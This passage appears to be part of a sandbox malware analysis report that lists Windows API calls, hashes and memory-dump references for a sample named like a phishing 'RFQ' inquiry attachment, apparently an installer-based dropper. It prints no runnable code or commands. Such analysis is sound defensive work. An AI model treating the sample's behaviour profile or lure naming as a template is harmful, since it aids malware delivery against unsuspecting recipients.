                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                    • String ID:
                                                                    • API String ID: 1941528284-0
                                                                    • Opcode ID: c3151a3063b88bf1de305e53cc32ec19a0b05aaf286facdde9d328bfaff361cf
                                                                    • Instruction ID: c9b8be7f26e3bb8f886377ec20d84860bb913b523593c9fc4340e73ed15d4a17
                                                                    • Opcode Fuzzy Hash: c3151a3063b88bf1de305e53cc32ec19a0b05aaf286facdde9d328bfaff361cf
                                                                    • Instruction Fuzzy Hash: 0041D531900114FACF20BFB5CC45EAE3A79EF45369B20423BF022B10E2D73C8A119A6D
                                                                    APIs
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: Close$DeleteEnumOpen
                                                                    • String ID:
                                                                    • API String ID: 1912718029-0
                                                                    • Opcode ID: b3c3789dbf1e9407cfaa69bc32a43c717e622f94ad988b79edf66977fe5f390d
                                                                    • Instruction ID: 13aa261ecf2a86817b53105e55b29f339a5543dfd3ea7b5a0579e289bf8829aa
                                                                    • Opcode Fuzzy Hash: b3c3789dbf1e9407cfaa69bc32a43c717e622f94ad988b79edf66977fe5f390d
                                                                    • Instruction Fuzzy Hash: 04116A71908118FFEF119F90DE8CEAE3B79FB14384F100476FA05A11A0D3B49E52AA69
                                                                    APIs
                                                                    • GetDC.USER32(?), ref: 00401D59
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                    • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                    • CreateFontIndirectW.GDI32(0040BDB0), ref: 00401DD1
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                    • String ID:
                                                                    • API String ID: 3808545654-0
                                                                    • Opcode ID: fdc5f2c1fa15137141abf920e2b66139c7875423c911a418118fe9d73be23372
                                                                    • Instruction ID: fb6460544efe8fce5462e25cc9af4f7d3d1b7b368dfcdde6bb1bed5e2218b2c2
                                                                    • Opcode Fuzzy Hash: fdc5f2c1fa15137141abf920e2b66139c7875423c911a418118fe9d73be23372
                                                                    • Instruction Fuzzy Hash: BC01A231958281AFE7026BB0AE0AB9A7F74FF25301F004479F501B62E2C77810048B6E
                                                                    APIs
                                                                    • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                    • lstrlenW.KERNEL32(0040A5A8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                    • RegSetValueExW.ADVAPI32(?,?,?,?,0040A5A8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                    • RegCloseKey.ADVAPI32(?,?,?,0040A5A8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateValuelstrlen
                                                                    • String ID:
                                                                    • API String ID: 1356686001-0
                                                                    • Opcode ID: defa2ff258bcc6687091bef99af7fb9620e9464aea729066e8816d9215c342de
                                                                    • Instruction ID: 604b722b9c55a9196ccdb8bc5d46c0fd7c9d49ef9fceb37282f2360b7a100841
                                                                    • Opcode Fuzzy Hash: defa2ff258bcc6687091bef99af7fb9620e9464aea729066e8816d9215c342de
                                                                    • Instruction Fuzzy Hash: 1B11AE71E00108BFEB10AFA4DE89EAE767CEB54358F10403AF904B61D1D6B85E419628
                                                                    APIs
                                                                      • Part of subcall function 00405179: lstrlenW.KERNEL32(004216C8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
                                                                      • Part of subcall function 00405179: lstrlenW.KERNEL32(00403160,004216C8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
                                                                      • Part of subcall function 00405179: lstrcatW.KERNEL32(004216C8,00403160), ref: 004051D4
                                                                      • Part of subcall function 00405179: SetWindowTextW.USER32(004216C8,004216C8), ref: 004051E6
                                                                      • Part of subcall function 00405179: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
                                                                      • Part of subcall function 00405179: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
                                                                      • Part of subcall function 00405179: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234
                                                                      • Part of subcall function 004056FA: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256F0,Error launching installer), ref: 00405723
                                                                      • Part of subcall function 004056FA: CloseHandle.KERNEL32(?), ref: 00405730
                                                                    • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                    • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                    • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                    • String ID:
                                                                    • API String ID: 3585118688-0
                                                                    • Opcode ID: af52580a24e9da0efc31eebc354f7a4cc3df4363f0d7d6f825fb150053a5d77b
                                                                    • Instruction ID: 19c395d66568059f601410a6cc42e832bf6643a8327f7d33ffb52a85e02cf26d
                                                                    • Opcode Fuzzy Hash: af52580a24e9da0efc31eebc354f7a4cc3df4363f0d7d6f825fb150053a5d77b
                                                                    • Instruction Fuzzy Hash: FF11A131900108EBCF21AFA1CC849DE7A76EB44314F204037F605B61E1C7798E81DB9E
                                                                    APIs
                                                                    • DestroyWindow.USER32(?,00000000,00402F6A,00000001,?,?,00434000,00403500,?), ref: 00402D9D
                                                                    • GetTickCount.KERNEL32 ref: 00402DBB
                                                                    • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                    • ShowWindow.USER32(00000000,00000005,?,?,00434000,00403500,?), ref: 00402DE6
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                    • String ID:
                                                                    • API String ID: 2102729457-0
                                                                    • Opcode ID: 011416fe75702845bce1ba086311cd5158525b87b3682f64fb458bf13ee2241f
                                                                    • Instruction ID: 84c2018479133c1a06627c8befec1d2e01839f263682f94960fa8353d768859b
                                                                    • Opcode Fuzzy Hash: 011416fe75702845bce1ba086311cd5158525b87b3682f64fb458bf13ee2241f
                                                                    • Instruction Fuzzy Hash: 29F0DA30909220BFC7616B24FD4CADB7BA5BB44B11B4145BAF005A11E4D3B95C81CA9D
                                                                    APIs
                                                                    • IsWindowVisible.USER32(?), ref: 0040511C
                                                                    • CallWindowProcW.USER32(?,?,?,?), ref: 0040516D
                                                                      • Part of subcall function 0040412A: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040413C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                    • String ID:
                                                                    • API String ID: 3748168415-3916222277
                                                                    • Opcode ID: b772241499b65645409c9fc33f4f8930a921897f459ee4d2270c46b35a81506b
                                                                    • Instruction ID: de30b2b7089f6fefb08e10281d0b4b3c30be484ea7ef601637de59f0c5b2ee24
                                                                    • Opcode Fuzzy Hash: b772241499b65645409c9fc33f4f8930a921897f459ee4d2270c46b35a81506b
                                                                    • Instruction Fuzzy Hash: 18015E71A0060CABDF216F11DD80B9B3A26EB94354F104036FA05792D2C3BA8C929B6D
                                                                    APIs
                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                    • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: `7~v0}
                                                                    • API String ID: 3850602802-2153329232
                                                                    • Opcode ID: b5ca2ebfc38e8c40cc9dd1a42e0f544b2ed62ef4447f49d6c3b0efbc094499f8
                                                                    • Instruction ID: 40f3ddd491d249f73d2fb4fc43cce1b0e50519406e0a546e2fe7b43c981aace9
                                                                    • Opcode Fuzzy Hash: b5ca2ebfc38e8c40cc9dd1a42e0f544b2ed62ef4447f49d6c3b0efbc094499f8
                                                                    • Instruction Fuzzy Hash: 2801D131B24210ABE7295B389D05B2A3698E710314F10863EB911F62F1DA78DC138B4D
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 00405C3C
                                                                    • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00434000,00403268,00436000,00436800,00436800,00436800,00436800,00436800,00436800,00403492), ref: 00405C57
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: CountFileNameTempTick
                                                                    • String ID: nsa
                                                                    • API String ID: 1716503409-2209301699
                                                                    • Opcode ID: b475e38dea5fb3e2c0bd2ffad844489a64f4d901e003652483f57aed9986a0af
                                                                    • Instruction ID: a4e54dcc62cd1b6bfc855809a1f33464b5edbff741e4ba4f72954512b04b2574
                                                                    • Opcode Fuzzy Hash: b475e38dea5fb3e2c0bd2ffad844489a64f4d901e003652483f57aed9986a0af
                                                                    • Instruction Fuzzy Hash: 58F09076B04204BBEB009F5ADD49ADFB7ACEB91710F10403AF900E7190E2B0AE44CB64
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $sq$$sq$$sq$$sq
                                                                    • API String ID: 0-2855845837
                                                                    • Opcode ID: cd1464309d546891394fa873121c419d3df3546d4024510cc694635c799d3809
                                                                    • Instruction ID: 49753dc8a0a13b167ee6b37b452afad8bf9a6908e01f259e2a5d8a29d332bcaf
                                                                    • Opcode Fuzzy Hash: cd1464309d546891394fa873121c419d3df3546d4024510cc694635c799d3809
                                                                    • Instruction Fuzzy Hash: B9B13974A00209CBEB19DBA5C89069EBBB3FF89301F648539E4059B355EF75DD86CB80
                                                                    APIs
                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256F0,Error launching installer), ref: 00405723
                                                                    • CloseHandle.KERNEL32(?), ref: 00405730
                                                                    Strings
                                                                    • Error launching installer, xrefs: 0040570D
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateHandleProcess
                                                                    • String ID: Error launching installer
                                                                    • API String ID: 3712363035-66219284
                                                                    • Opcode ID: 9acc92e2c7281f73b30f5830c9ca17af0a7e84f9092cfe2fe3dcf761661325f9
                                                                    • Instruction ID: 962493b9a5858e12d65c81fa64705238b81a3a8385349ca8c6d0e9dfe3a178e2
                                                                    • Opcode Fuzzy Hash: 9acc92e2c7281f73b30f5830c9ca17af0a7e84f9092cfe2fe3dcf761661325f9
                                                                    • Instruction Fuzzy Hash: 55E0BFB4A00209BFEB109F64ED05F7B76BCE714604F804521BE15F6190D7B4A8118A79
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000000B,?), ref: 00402A36
                                                                    • InvalidateRect.USER32(?), ref: 00402A46
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: InvalidateMessageRectSend
                                                                    • String ID: `7~v0}
                                                                    • API String ID: 909852535-2153329232
                                                                    • Opcode ID: 3e2961815588af2ded79425beba0fb08c488b6c7a93fa953e87e483052fceec8
                                                                    • Instruction ID: 16da0b38ed55193637b24288223d6ef15c802e427b401645bca05b51af9c9483
                                                                    • Opcode Fuzzy Hash: 3e2961815588af2ded79425beba0fb08c488b6c7a93fa953e87e483052fceec8
                                                                    • Instruction Fuzzy Hash: C6E046B2B00004BFDB20CBA4EC849AEB7B9EB80355B10847AF202A10A0D3345D01DA38
                                                                    APIs
                                                                    • SendMessageW.USER32(00000408,?,00000000,00403D14), ref: 004040D5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: `7~v0}$x
                                                                    • API String ID: 3850602802-2625865434
                                                                    • Opcode ID: 8c62ed3701929f089eee80cf20f2bc821b5c1c602f9c32056662057925d6695c
                                                                    • Instruction ID: 8f4742149faf644d9288b83943025539f1755d3edbceae6bb37026368d871f48
                                                                    • Opcode Fuzzy Hash: 8c62ed3701929f089eee80cf20f2bc821b5c1c602f9c32056662057925d6695c
                                                                    • Instruction Fuzzy Hash: D6C01271645201FADB204B00EE00B2A7A20BBA8702F208839F340220F086325823DB1E
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 70ed9be6b19a516ee1bdc764f9130b6af425552e808d5ec72e9cc5d630b6751c
                                                                    • Instruction ID: 4318c0865f168c3c39c32caca64743d138ecf2e5224254a141b4117f5842e3e1
                                                                    • Opcode Fuzzy Hash: 70ed9be6b19a516ee1bdc764f9130b6af425552e808d5ec72e9cc5d630b6751c
                                                                    • Instruction Fuzzy Hash: 6FA14371E00229CBDF28CFA8C854BADBBB1FF44305F15856AD816BB281C7785A96DF44
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b832d1e9d424bd17e50a448eaff65b5f67a7a37aa3c39c188fff0f0b003ab4d8
                                                                    • Instruction ID: 8bd9da501ed45a7f5d2d0dfc2be718583217048081f6288eced8fd4e99326474
                                                                    • Opcode Fuzzy Hash: b832d1e9d424bd17e50a448eaff65b5f67a7a37aa3c39c188fff0f0b003ab4d8
                                                                    • Instruction Fuzzy Hash: D3913370D00229CBDF28CFA8C854BADBBB1FF44305F15812AD816BB291C7795A96CF84
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 543efacfe09541fb47d16f599bc3d2f89866a74d148d0ce9a71c7f41fe14efce
                                                                    • Instruction ID: cc0f6ab454a14bc981dfc54755cdbe6dc6b21fe19783e5e5045ac21e9f873034
                                                                    • Opcode Fuzzy Hash: 543efacfe09541fb47d16f599bc3d2f89866a74d148d0ce9a71c7f41fe14efce
                                                                    • Instruction Fuzzy Hash: 57813271E00229CBDB24CFA8C844BADBBB1FF45305F25816AD816BB291C7789A95CF54
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 8 t:$X!F$x!F$vt:
                                                                    • API String ID: 0-3683422666
                                                                    • Opcode ID: 4a750e1d5157055b6594d837122da968a1975e4a1739c7dd027ace64c67e5cae
                                                                    • Instruction ID: 5169482b64b3f05fd19777ca1b7fae4b155238887b5fd82aafb53ab5042ef432
                                                                    • Opcode Fuzzy Hash: 4a750e1d5157055b6594d837122da968a1975e4a1739c7dd027ace64c67e5cae
                                                                    • Instruction Fuzzy Hash: 46618B35B002099FDB48EFA8D8905DDB7B2EB89310F608579E815EB351EB35DD4ACB90
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3a9d634eb22222d97a486b6052758e716192218fd024008837edea6b82b38ac0
                                                                    • Instruction ID: 36932640a45318c75a18aff77ab64511548531c3f0ac059ca6f487157756e1a6
                                                                    • Opcode Fuzzy Hash: 3a9d634eb22222d97a486b6052758e716192218fd024008837edea6b82b38ac0
                                                                    • Instruction Fuzzy Hash: DB816831D04229DBDB24CFA8D8447ADBBB0FF44305F15816AE856BB2C0C7785A96CF44
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0a494eb29fcb275a0dc763b13c131269b6bb38b3c553864eb09d0ec04662bdd1
                                                                    • Instruction ID: ff2225f7ed94bd6a4cfd13171a87750c77ef90a01ce87bb0bc5953b87d28885c
                                                                    • Opcode Fuzzy Hash: 0a494eb29fcb275a0dc763b13c131269b6bb38b3c553864eb09d0ec04662bdd1
                                                                    • Instruction Fuzzy Hash: F3712271E00229DBDF28CFA8C844BADBBB1FF44305F15806AD816BB281C7795A96DF54
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
